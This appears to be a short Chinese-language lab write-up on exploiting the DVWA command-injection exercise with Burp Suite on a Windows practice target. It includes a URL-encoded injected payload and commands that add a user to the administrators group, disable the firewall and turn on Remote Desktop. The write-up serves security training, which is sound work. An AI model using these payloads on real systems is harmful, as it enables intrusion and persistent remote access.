作者:切尔小妹_288 | 来源:互联网 | 2023-07-18 18:58
目录
1、输入IP地址之后,靶机执行了一个Ping命令
2、burp拦截数据包发送到重发器
3、对数据包进行修改,注入命令
作业准备:
1、kali虚拟机
2、靶机:Jdk环境、搭建DVWA靶场、phpStudy(Apache和MySQL都已配置)、BurpSuite抓包
3、虚拟主机
1、输入IP地址之后,靶机执行了一个Ping命令
发现乱码
乱码解决方法:
解决此问题的方法:在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”,修改”charset=gb2312”,即可
2、burp拦截数据包发送到重发器
3、对数据包进行修改,注入命令
①查看目标用户(whoami)
②查看目标机器上的用户(net user)
③在目标机器上添加一个用户
④查看上一步是否成功添加用户
⑤将添加的用户添加到管理员组,以hacker为例
net localgroup administrators hacker/add
⑥关闭目标防火墙
netsh firewall set opmode mode=disable
或者
netsh advfirewall set allprofiles state off
⑦开启windows远程桌面
ip=127.0.0.1%26wmic%20RDTOGGLE%20WHERE%20ServerName=%27%COMPUTERNAME%%27%20call%20SetAllowTSConnections%201&Submit=Submit
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1